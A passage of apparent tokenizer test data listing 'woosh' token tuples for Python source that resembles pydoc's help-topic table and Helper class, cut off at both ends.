woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1922, 21, 1922, 34),
woosh.Token(woosh.OP, ',', 1922, 34, 1922, 35),
woosh.Token(woosh.STRING, "'PRECEDENCE'", 1923, 8, 1923, 20),
woosh.Token(woosh.OP, ':', 1923, 20, 1923, 21),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1923, 22, 1923, 35),
woosh.Token(woosh.OP, ',', 1923, 35, 1923, 36),
woosh.Token(woosh.STRING, "'OBJECTS'", 1924, 8, 1924, 17),
woosh.Token(woosh.OP, ':', 1924, 17, 1924, 18),
woosh.Token(woosh.OP, '(', 1924, 19, 1924, 20),
woosh.Token(woosh.STRING, "'objects'", 1924, 20, 1924, 29),
woosh.Token(woosh.OP, ',', 1924, 29, 1924, 30),
woosh.Token(woosh.STRING, "'TYPES'", 1924, 31, 1924, 38),
woosh.Token(woosh.OP, ')', 1924, 38, 1924, 39),
woosh.Token(woosh.OP, ',', 1924, 39, 1924, 40),
woosh.Token(woosh.STRING, "'SPECIALMETHODS'", 1925, 8, 1925, 24),
woosh.Token(woosh.OP, ':', 1925, 24, 1925, 25),
woosh.Token(woosh.OP, '(', 1925, 26, 1925, 27),
woosh.Token(woosh.STRING, "'specialnames'", 1925, 27, 1925, 41),
woosh.Token(woosh.OP, ',', 1925, 41, 1925, 42),
woosh.Token(woosh.STRING, "'BASICMETHODS ATTRIBUTEMETHODS '", 1925, 43, 1925, 75),
woosh.Token(woosh.STRING, "'CALLABLEMETHODS SEQUENCEMETHODS MAPPINGMETHODS '", 1926, 27, 1926, 76),
woosh.Token(woosh.STRING, "'NUMBERMETHODS CLASSES'", 1927, 27, 1927, 50),
woosh.Token(woosh.OP, ')', 1927, 50, 1927, 51),
woosh.Token(woosh.OP, ',', 1927, 51, 1927, 52),
woosh.Token(woosh.STRING, "'BASICMETHODS'", 1928, 8, 1928, 22),
woosh.Token(woosh.OP, ':', 1928, 22, 1928, 23),
woosh.Token(woosh.OP, '(', 1928, 24, 1928, 25),
woosh.Token(woosh.STRING, "'customization'", 1928, 25, 1928, 40),
woosh.Token(woosh.OP, ',', 1928, 40, 1928, 41),
woosh.Token(woosh.STRING, "'hash repr str SPECIALMETHODS'", 1928, 42, 1928, 72),
woosh.Token(woosh.OP, ')', 1928, 72, 1928, 73),
woosh.Token(woosh.OP, ',', 1928, 73, 1928, 74),
woosh.Token(woosh.STRING, "'ATTRIBUTEMETHODS'", 1929, 8, 1929, 26),
woosh.Token(woosh.OP, ':', 1929, 26, 1929, 27),
woosh.Token(woosh.OP, '(', 1929, 28, 1929, 29),
woosh.Token(woosh.STRING, "'attribute-access'", 1929, 29, 1929, 47),
woosh.Token(woosh.OP, ',', 1929, 47, 1929, 48),
woosh.Token(woosh.STRING, "'ATTRIBUTES SPECIALMETHODS'", 1929, 49, 1929, 76),
woosh.Token(woosh.OP, ')', 1929, 76, 1929, 77),
woosh.Token(woosh.OP, ',', 1929, 77, 1929, 78),
woosh.Token(woosh.STRING, "'CALLABLEMETHODS'", 1930, 8, 1930, 25),
woosh.Token(woosh.OP, ':', 1930, 25, 1930, 26),
woosh.Token(woosh.OP, '(', 1930, 27, 1930, 28),
woosh.Token(woosh.STRING, "'callable-types'", 1930, 28, 1930, 44),
woosh.Token(woosh.OP, ',', 1930, 44, 1930, 45),
woosh.Token(woosh.STRING, "'CALLS SPECIALMETHODS'", 1930, 46, 1930, 68),
woosh.Token(woosh.OP, ')', 1930, 68, 1930, 69),
woosh.Token(woosh.OP, ',', 1930, 69, 1930, 70),
woosh.Token(woosh.STRING, "'SEQUENCEMETHODS'", 1931, 8, 1931, 25),
woosh.Token(woosh.OP, ':', 1931, 25, 1931, 26),
woosh.Token(woosh.OP, '(', 1931, 27, 1931, 28),
woosh.Token(woosh.STRING, "'sequence-types'", 1931, 28, 1931, 44),
woosh.Token(woosh.OP, ',', 1931, 44, 1931, 45),
woosh.Token(woosh.STRING, "'SEQUENCES SEQUENCEMETHODS '", 1931, 46, 1931, 74),
woosh.Token(woosh.STRING, "'SPECIALMETHODS'", 1932, 29, 1932, 45),
woosh.Token(woosh.OP, ')', 1932, 45, 1932, 46),
woosh.Token(woosh.OP, ',', 1932, 46, 1932, 47),
woosh.Token(woosh.STRING, "'MAPPINGMETHODS'", 1933, 8, 1933, 24),
woosh.Token(woosh.OP, ':', 1933, 24, 1933, 25),
woosh.Token(woosh.OP, '(', 1933, 26, 1933, 27),
woosh.Token(woosh.STRING, "'sequence-types'", 1933, 27, 1933, 43),
woosh.Token(woosh.OP, ',', 1933, 43, 1933, 44),
woosh.Token(woosh.STRING, "'MAPPINGS SPECIALMETHODS'", 1933, 45, 1933, 70),
woosh.Token(woosh.OP, ')', 1933, 70, 1933, 71),
woosh.Token(woosh.OP, ',', 1933, 71, 1933, 72),
woosh.Token(woosh.STRING, "'NUMBERMETHODS'", 1934, 8, 1934, 23),
woosh.Token(woosh.OP, ':', 1934, 23, 1934, 24),
woosh.Token(woosh.OP, '(', 1934, 25, 1934, 26),
woosh.Token(woosh.STRING, "'numeric-types'", 1934, 26, 1934, 41),
woosh.Token(woosh.OP, ',', 1934, 41, 1934, 42),
woosh.Token(woosh.STRING, "'NUMBERS AUGMENTEDASSIGNMENT '", 1934, 43, 1934, 73),
woosh.Token(woosh.STRING, "'SPECIALMETHODS'", 1935, 26, 1935, 42),
woosh.Token(woosh.OP, ')', 1935, 42, 1935, 43),
woosh.Token(woosh.OP, ',', 1935, 43, 1935, 44),
woosh.Token(woosh.STRING, "'EXECUTION'", 1936, 8, 1936, 19),
woosh.Token(woosh.OP, ':', 1936, 19, 1936, 20),
woosh.Token(woosh.OP, '(', 1936, 21, 1936, 22),
woosh.Token(woosh.STRING, "'execmodel'", 1936, 22, 1936, 33),
woosh.Token(woosh.OP, ',', 1936, 33, 1936, 34),
woosh.Token(woosh.STRING, "'NAMESPACES DYNAMICFEATURES EXCEPTIONS'", 1936, 35, 1936, 74),
woosh.Token(woosh.OP, ')', 1936, 74, 1936, 75),
woosh.Token(woosh.OP, ',', 1936, 75, 1936, 76),
woosh.Token(woosh.STRING, "'NAMESPACES'", 1937, 8, 1937, 20),
woosh.Token(woosh.OP, ':', 1937, 20, 1937, 21),
woosh.Token(woosh.OP, '(', 1937, 22, 1937, 23),
woosh.Token(woosh.STRING, "'naming'", 1937, 23, 1937, 31),
woosh.Token(woosh.OP, ',', 1937, 31, 1937, 32),
woosh.Token(woosh.STRING, "'global nonlocal ASSIGNMENT DELETION DYNAMICFEATURES'", 1937, 33, 1937, 86),
woosh.Token(woosh.OP, ')', 1937, 86, 1937, 87),
woosh.Token(woosh.OP, ',', 1937, 87, 1937, 88),
woosh.Token(woosh.STRING, "'DYNAMICFEATURES'", 1938, 8, 1938, 25),
woosh.Token(woosh.OP, ':', 1938, 25, 1938, 26),
woosh.Token(woosh.OP, '(', 1938, 27, 1938, 28),
woosh.Token(woosh.STRING, "'dynamic-features'", 1938, 28, 1938, 46),
woosh.Token(woosh.OP, ',', 1938, 46, 1938, 47),
woosh.Token(woosh.STRING, "''", 1938, 48, 1938, 50),
woosh.Token(woosh.OP, ')', 1938, 50, 1938, 51),
woosh.Token(woosh.OP, ',', 1938, 51, 1938, 52),
woosh.Token(woosh.STRING, "'SCOPING'", 1939, 8, 1939, 17),
woosh.Token(woosh.OP, ':', 1939, 17, 1939, 18),
woosh.Token(woosh.STRING, "'NAMESPACES'", 1939, 19, 1939, 31),
woosh.Token(woosh.OP, ',', 1939, 31, 1939, 32),
woosh.Token(woosh.STRING, "'FRAMES'", 1940, 8, 1940, 16),
woosh.Token(woosh.OP, ':', 1940, 16, 1940, 17),
woosh.Token(woosh.STRING, "'NAMESPACES'", 1940, 18, 1940, 30),
woosh.Token(woosh.OP, ',', 1940, 30, 1940, 31),
woosh.Token(woosh.STRING, "'EXCEPTIONS'", 1941, 8, 1941, 20),
woosh.Token(woosh.OP, ':', 1941, 20, 1941, 21),
woosh.Token(woosh.OP, '(', 1941, 22, 1941, 23),
woosh.Token(woosh.STRING, "'exceptions'", 1941, 23, 1941, 35),
woosh.Token(woosh.OP, ',', 1941, 35, 1941, 36),
woosh.Token(woosh.STRING, "'try except finally raise'", 1941, 37, 1941, 63),
woosh.Token(woosh.OP, ')', 1941, 63, 1941, 64),
woosh.Token(woosh.OP, ',', 1941, 64, 1941, 65),
woosh.Token(woosh.STRING, "'CONVERSIONS'", 1942, 8, 1942, 21),
woosh.Token(woosh.OP, ':', 1942, 21, 1942, 22),
woosh.Token(woosh.OP, '(', 1942, 23, 1942, 24),
woosh.Token(woosh.STRING, "'conversions'", 1942, 24, 1942, 37),
woosh.Token(woosh.OP, ',', 1942, 37, 1942, 38),
woosh.Token(woosh.STRING, "''", 1942, 39, 1942, 41),
woosh.Token(woosh.OP, ')', 1942, 41, 1942, 42),
woosh.Token(woosh.OP, ',', 1942, 42, 1942, 43),
woosh.Token(woosh.STRING, "'IDENTIFIERS'", 1943, 8, 1943, 21),
woosh.Token(woosh.OP, ':', 1943, 21, 1943, 22),
woosh.Token(woosh.OP, '(', 1943, 23, 1943, 24),
woosh.Token(woosh.STRING, "'identifiers'", 1943, 24, 1943, 37),
woosh.Token(woosh.OP, ',', 1943, 37, 1943, 38),
woosh.Token(woosh.STRING, "'keywords SPECIALIDENTIFIERS'", 1943, 39, 1943, 68),
woosh.Token(woosh.OP, ')', 1943, 68, 1943, 69),
woosh.Token(woosh.OP, ',', 1943, 69, 1943, 70),
woosh.Token(woosh.STRING, "'SPECIALIDENTIFIERS'", 1944, 8, 1944, 28),
woosh.Token(woosh.OP, ':', 1944, 28, 1944, 29),
woosh.Token(woosh.OP, '(', 1944, 30, 1944, 31),
woosh.Token(woosh.STRING, "'id-classes'", 1944, 31, 1944, 43),
woosh.Token(woosh.OP, ',', 1944, 43, 1944, 44),
woosh.Token(woosh.STRING, "''", 1944, 45, 1944, 47),
woosh.Token(woosh.OP, ')', 1944, 47, 1944, 48),
woosh.Token(woosh.OP, ',', 1944, 48, 1944, 49),
woosh.Token(woosh.STRING, "'PRIVATENAMES'", 1945, 8, 1945, 22),
woosh.Token(woosh.OP, ':', 1945, 22, 1945, 23),
woosh.Token(woosh.OP, '(', 1945, 24, 1945, 25),
woosh.Token(woosh.STRING, "'atom-identifiers'", 1945, 25, 1945, 43),
woosh.Token(woosh.OP, ',', 1945, 43, 1945, 44),
woosh.Token(woosh.STRING, "''", 1945, 45, 1945, 47),
woosh.Token(woosh.OP, ')', 1945, 47, 1945, 48),
woosh.Token(woosh.OP, ',', 1945, 48, 1945, 49),
woosh.Token(woosh.STRING, "'LITERALS'", 1946, 8, 1946, 18),
woosh.Token(woosh.OP, ':', 1946, 18, 1946, 19),
woosh.Token(woosh.OP, '(', 1946, 20, 1946, 21),
woosh.Token(woosh.STRING, "'atom-literals'", 1946, 21, 1946, 36),
woosh.Token(woosh.OP, ',', 1946, 36, 1946, 37),
woosh.Token(woosh.STRING, "'STRINGS NUMBERS TUPLELITERALS '", 1946, 38, 1946, 70),
woosh.Token(woosh.STRING, "'LISTLITERALS DICTIONARYLITERALS'", 1947, 21, 1947, 54),
woosh.Token(woosh.OP, ')', 1947, 54, 1947, 55),
woosh.Token(woosh.OP, ',', 1947, 55, 1947, 56),
woosh.Token(woosh.STRING, "'TUPLES'", 1948, 8, 1948, 16),
woosh.Token(woosh.OP, ':', 1948, 16, 1948, 17),
woosh.Token(woosh.STRING, "'SEQUENCES'", 1948, 18, 1948, 29),
woosh.Token(woosh.OP, ',', 1948, 29, 1948, 30),
woosh.Token(woosh.STRING, "'TUPLELITERALS'", 1949, 8, 1949, 23),
woosh.Token(woosh.OP, ':', 1949, 23, 1949, 24),
woosh.Token(woosh.OP, '(', 1949, 25, 1949, 26),
woosh.Token(woosh.STRING, "'exprlists'", 1949, 26, 1949, 37),
woosh.Token(woosh.OP, ',', 1949, 37, 1949, 38),
woosh.Token(woosh.STRING, "'TUPLES LITERALS'", 1949, 39, 1949, 56),
woosh.Token(woosh.OP, ')', 1949, 56, 1949, 57),
woosh.Token(woosh.OP, ',', 1949, 57, 1949, 58),
woosh.Token(woosh.STRING, "'LISTS'", 1950, 8, 1950, 15),
woosh.Token(woosh.OP, ':', 1950, 15, 1950, 16),
woosh.Token(woosh.OP, '(', 1950, 17, 1950, 18),
woosh.Token(woosh.STRING, "'typesseq-mutable'", 1950, 18, 1950, 36),
woosh.Token(woosh.OP, ',', 1950, 36, 1950, 37),
woosh.Token(woosh.STRING, "'LISTLITERALS'", 1950, 38, 1950, 52),
woosh.Token(woosh.OP, ')', 1950, 52, 1950, 53),
woosh.Token(woosh.OP, ',', 1950, 53, 1950, 54),
woosh.Token(woosh.STRING, "'LISTLITERALS'", 1951, 8, 1951, 22),
woosh.Token(woosh.OP, ':', 1951, 22, 1951, 23),
woosh.Token(woosh.OP, '(', 1951, 24, 1951, 25),
woosh.Token(woosh.STRING, "'lists'", 1951, 25, 1951, 32),
woosh.Token(woosh.OP, ',', 1951, 32, 1951, 33),
woosh.Token(woosh.STRING, "'LISTS LITERALS'", 1951, 34, 1951, 50),
woosh.Token(woosh.OP, ')', 1951, 50, 1951, 51),
woosh.Token(woosh.OP, ',', 1951, 51, 1951, 52),
woosh.Token(woosh.STRING, "'DICTIONARIES'", 1952, 8, 1952, 22),
woosh.Token(woosh.OP, ':', 1952, 22, 1952, 23),
woosh.Token(woosh.OP, '(', 1952, 24, 1952, 25),
woosh.Token(woosh.STRING, "'typesmapping'", 1952, 25, 1952, 39),
woosh.Token(woosh.OP, ',', 1952, 39, 1952, 40),
woosh.Token(woosh.STRING, "'DICTIONARYLITERALS'", 1952, 41, 1952, 61),
woosh.Token(woosh.OP, ')', 1952, 61, 1952, 62),
woosh.Token(woosh.OP, ',', 1952, 62, 1952, 63),
woosh.Token(woosh.STRING, "'DICTIONARYLITERALS'", 1953, 8, 1953, 28),
woosh.Token(woosh.OP, ':', 1953, 28, 1953, 29),
woosh.Token(woosh.OP, '(', 1953, 30, 1953, 31),
woosh.Token(woosh.STRING, "'dict'", 1953, 31, 1953, 37),
woosh.Token(woosh.OP, ',', 1953, 37, 1953, 38),
woosh.Token(woosh.STRING, "'DICTIONARIES LITERALS'", 1953, 39, 1953, 62),
woosh.Token(woosh.OP, ')', 1953, 62, 1953, 63),
woosh.Token(woosh.OP, ',', 1953, 63, 1953, 64),
woosh.Token(woosh.STRING, "'ATTRIBUTES'", 1954, 8, 1954, 20),
woosh.Token(woosh.OP, ':', 1954, 20, 1954, 21),
woosh.Token(woosh.OP, '(', 1954, 22, 1954, 23),
woosh.Token(woosh.STRING, "'attribute-references'", 1954, 23, 1954, 45),
woosh.Token(woosh.OP, ',', 1954, 45, 1954, 46),
woosh.Token(woosh.STRING, "'getattr hasattr setattr ATTRIBUTEMETHODS'", 1954, 47, 1954, 89),
woosh.Token(woosh.OP, ')', 1954, 89, 1954, 90),
woosh.Token(woosh.OP, ',', 1954, 90, 1954, 91),
woosh.Token(woosh.STRING, "'SUBSCRIPTS'", 1955, 8, 1955, 20),
woosh.Token(woosh.OP, ':', 1955, 20, 1955, 21),
woosh.Token(woosh.OP, '(', 1955, 22, 1955, 23),
woosh.Token(woosh.STRING, "'subscriptions'", 1955, 23, 1955, 38),
woosh.Token(woosh.OP, ',', 1955, 38, 1955, 39),
woosh.Token(woosh.STRING, "'SEQUENCEMETHODS'", 1955, 40, 1955, 57),
woosh.Token(woosh.OP, ')', 1955, 57, 1955, 58),
woosh.Token(woosh.OP, ',', 1955, 58, 1955, 59),
woosh.Token(woosh.STRING, "'SLICINGS'", 1956, 8, 1956, 18),
woosh.Token(woosh.OP, ':', 1956, 18, 1956, 19),
woosh.Token(woosh.OP, '(', 1956, 20, 1956, 21),
woosh.Token(woosh.STRING, "'slicings'", 1956, 21, 1956, 31),
woosh.Token(woosh.OP, ',', 1956, 31, 1956, 32),
woosh.Token(woosh.STRING, "'SEQUENCEMETHODS'", 1956, 33, 1956, 50),
woosh.Token(woosh.OP, ')', 1956, 50, 1956, 51),
woosh.Token(woosh.OP, ',', 1956, 51, 1956, 52),
woosh.Token(woosh.STRING, "'CALLS'", 1957, 8, 1957, 15),
woosh.Token(woosh.OP, ':', 1957, 15, 1957, 16),
woosh.Token(woosh.OP, '(', 1957, 17, 1957, 18),
woosh.Token(woosh.STRING, "'calls'", 1957, 18, 1957, 25),
woosh.Token(woosh.OP, ',', 1957, 25, 1957, 26),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1957, 27, 1957, 40),
woosh.Token(woosh.OP, ')', 1957, 40, 1957, 41),
woosh.Token(woosh.OP, ',', 1957, 41, 1957, 42),
woosh.Token(woosh.STRING, "'POWER'", 1958, 8, 1958, 15),
woosh.Token(woosh.OP, ':', 1958, 15, 1958, 16),
woosh.Token(woosh.OP, '(', 1958, 17, 1958, 18),
woosh.Token(woosh.STRING, "'power'", 1958, 18, 1958, 25),
woosh.Token(woosh.OP, ',', 1958, 25, 1958, 26),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1958, 27, 1958, 40),
woosh.Token(woosh.OP, ')', 1958, 40, 1958, 41),
woosh.Token(woosh.OP, ',', 1958, 41, 1958, 42),
woosh.Token(woosh.STRING, "'UNARY'", 1959, 8, 1959, 15),
woosh.Token(woosh.OP, ':', 1959, 15, 1959, 16),
woosh.Token(woosh.OP, '(', 1959, 17, 1959, 18),
woosh.Token(woosh.STRING, "'unary'", 1959, 18, 1959, 25),
woosh.Token(woosh.OP, ',', 1959, 25, 1959, 26),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1959, 27, 1959, 40),
woosh.Token(woosh.OP, ')', 1959, 40, 1959, 41),
woosh.Token(woosh.OP, ',', 1959, 41, 1959, 42),
woosh.Token(woosh.STRING, "'BINARY'", 1960, 8, 1960, 16),
woosh.Token(woosh.OP, ':', 1960, 16, 1960, 17),
woosh.Token(woosh.OP, '(', 1960, 18, 1960, 19),
woosh.Token(woosh.STRING, "'binary'", 1960, 19, 1960, 27),
woosh.Token(woosh.OP, ',', 1960, 27, 1960, 28),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1960, 29, 1960, 42),
woosh.Token(woosh.OP, ')', 1960, 42, 1960, 43),
woosh.Token(woosh.OP, ',', 1960, 43, 1960, 44),
woosh.Token(woosh.STRING, "'SHIFTING'", 1961, 8, 1961, 18),
woosh.Token(woosh.OP, ':', 1961, 18, 1961, 19),
woosh.Token(woosh.OP, '(', 1961, 20, 1961, 21),
woosh.Token(woosh.STRING, "'shifting'", 1961, 21, 1961, 31),
woosh.Token(woosh.OP, ',', 1961, 31, 1961, 32),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1961, 33, 1961, 46),
woosh.Token(woosh.OP, ')', 1961, 46, 1961, 47),
woosh.Token(woosh.OP, ',', 1961, 47, 1961, 48),
woosh.Token(woosh.STRING, "'BITWISE'", 1962, 8, 1962, 17),
woosh.Token(woosh.OP, ':', 1962, 17, 1962, 18),
woosh.Token(woosh.OP, '(', 1962, 19, 1962, 20),
woosh.Token(woosh.STRING, "'bitwise'", 1962, 20, 1962, 29),
woosh.Token(woosh.OP, ',', 1962, 29, 1962, 30),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1962, 31, 1962, 44),
woosh.Token(woosh.OP, ')', 1962, 44, 1962, 45),
woosh.Token(woosh.OP, ',', 1962, 45, 1962, 46),
woosh.Token(woosh.STRING, "'COMPARISON'", 1963, 8, 1963, 20),
woosh.Token(woosh.OP, ':', 1963, 20, 1963, 21),
woosh.Token(woosh.OP, '(', 1963, 22, 1963, 23),
woosh.Token(woosh.STRING, "'comparisons'", 1963, 23, 1963, 36),
woosh.Token(woosh.OP, ',', 1963, 36, 1963, 37),
woosh.Token(woosh.STRING, "'EXPRESSIONS BASICMETHODS'", 1963, 38, 1963, 64),
woosh.Token(woosh.OP, ')', 1963, 64, 1963, 65),
woosh.Token(woosh.OP, ',', 1963, 65, 1963, 66),
woosh.Token(woosh.STRING, "'BOOLEAN'", 1964, 8, 1964, 17),
woosh.Token(woosh.OP, ':', 1964, 17, 1964, 18),
woosh.Token(woosh.OP, '(', 1964, 19, 1964, 20),
woosh.Token(woosh.STRING, "'booleans'", 1964, 20, 1964, 30),
woosh.Token(woosh.OP, ',', 1964, 30, 1964, 31),
woosh.Token(woosh.STRING, "'EXPRESSIONS TRUTHVALUE'", 1964, 32, 1964, 56),
woosh.Token(woosh.OP, ')', 1964, 56, 1964, 57),
woosh.Token(woosh.OP, ',', 1964, 57, 1964, 58),
woosh.Token(woosh.STRING, "'ASSERTION'", 1965, 8, 1965, 19),
woosh.Token(woosh.OP, ':', 1965, 19, 1965, 20),
woosh.Token(woosh.STRING, "'assert'", 1965, 21, 1965, 29),
woosh.Token(woosh.OP, ',', 1965, 29, 1965, 30),
woosh.Token(woosh.STRING, "'ASSIGNMENT'", 1966, 8, 1966, 20),
woosh.Token(woosh.OP, ':', 1966, 20, 1966, 21),
woosh.Token(woosh.OP, '(', 1966, 22, 1966, 23),
woosh.Token(woosh.STRING, "'assignment'", 1966, 23, 1966, 35),
woosh.Token(woosh.OP, ',', 1966, 35, 1966, 36),
woosh.Token(woosh.STRING, "'AUGMENTEDASSIGNMENT'", 1966, 37, 1966, 58),
woosh.Token(woosh.OP, ')', 1966, 58, 1966, 59),
woosh.Token(woosh.OP, ',', 1966, 59, 1966, 60),
woosh.Token(woosh.STRING, "'AUGMENTEDASSIGNMENT'", 1967, 8, 1967, 29),
woosh.Token(woosh.OP, ':', 1967, 29, 1967, 30),
woosh.Token(woosh.OP, '(', 1967, 31, 1967, 32),
woosh.Token(woosh.STRING, "'augassign'", 1967, 32, 1967, 43),
woosh.Token(woosh.OP, ',', 1967, 43, 1967, 44),
woosh.Token(woosh.STRING, "'NUMBERMETHODS'", 1967, 45, 1967, 60),
woosh.Token(woosh.OP, ')', 1967, 60, 1967, 61),
woosh.Token(woosh.OP, ',', 1967, 61, 1967, 62),
woosh.Token(woosh.STRING, "'DELETION'", 1968, 8, 1968, 18),
woosh.Token(woosh.OP, ':', 1968, 18, 1968, 19),
woosh.Token(woosh.STRING, "'del'", 1968, 20, 1968, 25),
woosh.Token(woosh.OP, ',', 1968, 25, 1968, 26),
woosh.Token(woosh.STRING, "'RETURNING'", 1969, 8, 1969, 19),
woosh.Token(woosh.OP, ':', 1969, 19, 1969, 20),
woosh.Token(woosh.STRING, "'return'", 1969, 21, 1969, 29),
woosh.Token(woosh.OP, ',', 1969, 29, 1969, 30),
woosh.Token(woosh.STRING, "'IMPORTING'", 1970, 8, 1970, 19),
woosh.Token(woosh.OP, ':', 1970, 19, 1970, 20),
woosh.Token(woosh.STRING, "'import'", 1970, 21, 1970, 29),
woosh.Token(woosh.OP, ',', 1970, 29, 1970, 30),
woosh.Token(woosh.STRING, "'CONDITIONAL'", 1971, 8, 1971, 21),
woosh.Token(woosh.OP, ':', 1971, 21, 1971, 22),
woosh.Token(woosh.STRING, "'if'", 1971, 23, 1971, 27),
woosh.Token(woosh.OP, ',', 1971, 27, 1971, 28),
woosh.Token(woosh.STRING, "'LOOPING'", 1972, 8, 1972, 17),
woosh.Token(woosh.OP, ':', 1972, 17, 1972, 18),
woosh.Token(woosh.OP, '(', 1972, 19, 1972, 20),
woosh.Token(woosh.STRING, "'compound'", 1972, 20, 1972, 30),
woosh.Token(woosh.OP, ',', 1972, 30, 1972, 31),
woosh.Token(woosh.STRING, "'for while break continue'", 1972, 32, 1972, 58),
woosh.Token(woosh.OP, ')', 1972, 58, 1972, 59),
woosh.Token(woosh.OP, ',', 1972, 59, 1972, 60),
woosh.Token(woosh.STRING, "'TRUTHVALUE'", 1973, 8, 1973, 20),
woosh.Token(woosh.OP, ':', 1973, 20, 1973, 21),
woosh.Token(woosh.OP, '(', 1973, 22, 1973, 23),
woosh.Token(woosh.STRING, "'truth'", 1973, 23, 1973, 30),
woosh.Token(woosh.OP, ',', 1973, 30, 1973, 31),
woosh.Token(woosh.STRING, "'if while and or not BASICMETHODS'", 1973, 32, 1973, 66),
woosh.Token(woosh.OP, ')', 1973, 66, 1973, 67),
woosh.Token(woosh.OP, ',', 1973, 67, 1973, 68),
woosh.Token(woosh.STRING, "'DEBUGGING'", 1974, 8, 1974, 19),
woosh.Token(woosh.OP, ':', 1974, 19, 1974, 20),
woosh.Token(woosh.OP, '(', 1974, 21, 1974, 22),
woosh.Token(woosh.STRING, "'debugger'", 1974, 22, 1974, 32),
woosh.Token(woosh.OP, ',', 1974, 32, 1974, 33),
woosh.Token(woosh.STRING, "'pdb'", 1974, 34, 1974, 39),
woosh.Token(woosh.OP, ')', 1974, 39, 1974, 40),
woosh.Token(woosh.OP, ',', 1974, 40, 1974, 41),
woosh.Token(woosh.STRING, "'CONTEXTMANAGERS'", 1975, 8, 1975, 25),
woosh.Token(woosh.OP, ':', 1975, 25, 1975, 26),
woosh.Token(woosh.OP, '(', 1975, 27, 1975, 28),
woosh.Token(woosh.STRING, "'context-managers'", 1975, 28, 1975, 46),
woosh.Token(woosh.OP, ',', 1975, 46, 1975, 47),
woosh.Token(woosh.STRING, "'with'", 1975, 48, 1975, 54),
woosh.Token(woosh.OP, ')', 1975, 54, 1975, 55),
woosh.Token(woosh.OP, ',', 1975, 55, 1975, 56),
woosh.Token(woosh.OP, '}', 1976, 4, 1976, 5),
woosh.Token(woosh.NEWLINE, '\r\n', 1976, 5, 1977, 0),
woosh.Token(woosh.NAME, 'def', 1978, 4, 1978, 7),
woosh.Token(woosh.NAME, '__init__', 1978, 8, 1978, 16),
woosh.Token(woosh.OP, '(', 1978, 16, 1978, 17),
woosh.Token(woosh.NAME, 'self', 1978, 17, 1978, 21),
woosh.Token(woosh.OP, ',', 1978, 21, 1978, 22),
woosh.Token(woosh.NAME, 'input', 1978, 23, 1978, 28),
woosh.Token(woosh.OP, '=', 1978, 28, 1978, 29),
woosh.Token(woosh.NAME, 'None', 1978, 29, 1978, 33),
woosh.Token(woosh.OP, ',', 1978, 33, 1978, 34),
woosh.Token(woosh.NAME, 'output', 1978, 35, 1978, 41),
woosh.Token(woosh.OP, '=', 1978, 41, 1978, 42),
woosh.Token(woosh.NAME, 'None', 1978, 42, 1978, 46),
woosh.Token(woosh.OP, ')', 1978, 46, 1978, 47),
woosh.Token(woosh.OP, ':', 1978, 47, 1978, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1978, 48, 1979, 0),
woosh.Token(woosh.INDENT, ' ', 1979, 0, 1979, 8),
woosh.Token(woosh.NAME, 'self', 1979, 8, 1979, 12),
woosh.Token(woosh.OP, '.', 1979, 12, 1979, 13),
woosh.Token(woosh.NAME, '_input', 1979, 13, 1979, 19),
woosh.Token(woosh.OP, '=', 1979, 20, 1979, 21),
woosh.Token(woosh.NAME, 'input', 1979, 22, 1979, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1979, 27, 1980, 0),
woosh.Token(woosh.NAME, 'self', 1980, 8, 1980, 12),
woosh.Token(woosh.OP, '.', 1980, 12, 1980, 13),
woosh.Token(woosh.NAME, '_output', 1980, 13, 1980, 20),
woosh.Token(woosh.OP, '=', 1980, 21, 1980, 22),
woosh.Token(woosh.NAME, 'output', 1980, 23, 1980, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1980, 29, 1981, 0),
woosh.Token(woosh.DEDENT, ' ', 1982, 0, 1982, 4),
woosh.Token(woosh.OP, '@', 1982, 4, 1982, 5),
woosh.Token(woosh.NAME, 'property', 1982, 5, 1982, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1982, 13, 1983, 0),
woosh.Token(woosh.NAME, 'def', 1983, 4, 1983, 7),
woosh.Token(woosh.NAME, 'input', 1983, 8, 1983, 13),
woosh.Token(woosh.OP, '(', 1983, 13, 1983, 14),
woosh.Token(woosh.NAME, 'self', 1983, 14, 1983, 18),
woosh.Token(woosh.OP, ')', 1983, 18, 1983, 19),
woosh.Token(woosh.OP, ':', 1983, 19, 1983, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1983, 20, 1984, 0),
woosh.Token(woosh.INDENT, ' ', 1984, 0, 1984, 8),
woosh.Token(woosh.NAME, 'return', 1984, 8, 1984, 14),
woosh.Token(woosh.NAME, 'self', 1984, 15, 1984, 19),
woosh.Token(woosh.OP, '.', 1984, 19, 1984, 20),
woosh.Token(woosh.NAME, '_input', 1984, 20, 1984, 26),
woosh.Token(woosh.NAME, 'or', 1984, 27, 1984, 29),
woosh.Token(woosh.NAME, 'sys', 1984, 30, 1984, 33),
woosh.Token(woosh.OP, '.', 1984, 33, 1984, 34),
woosh.Token(woosh.NAME, 'stdin', 1984, 34, 1984, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1984, 39, 1985, 0),
woosh.Token(woosh.DEDENT, ' ', 1986, 0, 1986, 4),
woosh.Token(woosh.OP, '@', 1986, 4, 1986, 5),
woosh.Token(woosh.NAME, 'property', 1986, 5, 1986, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1986, 13, 1987, 0),
woosh.Token(woosh.NAME, 'def', 1987, 4, 1987, 7),
woosh.Token(woosh.NAME, 'output', 1987, 8, 1987, 14),
woosh.Token(woosh.OP, '(', 1987, 14, 1987, 15),
woosh.Token(woosh.NAME, 'self', 1987, 15, 1987, 19),
woosh.Token(woosh.OP, ')', 1987, 19, 1987, 20),
woosh.Token(woosh.OP, ':', 1987, 20, 1987, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1987, 21, 1988, 0),
woosh.Token(woosh.INDENT, ' ', 1988, 0, 1988, 8),
woosh.Token(woosh.NAME, 'return', 1988, 8, 1988, 14),
woosh.Token(woosh.NAME, 'self', 1988, 15, 1988, 19),
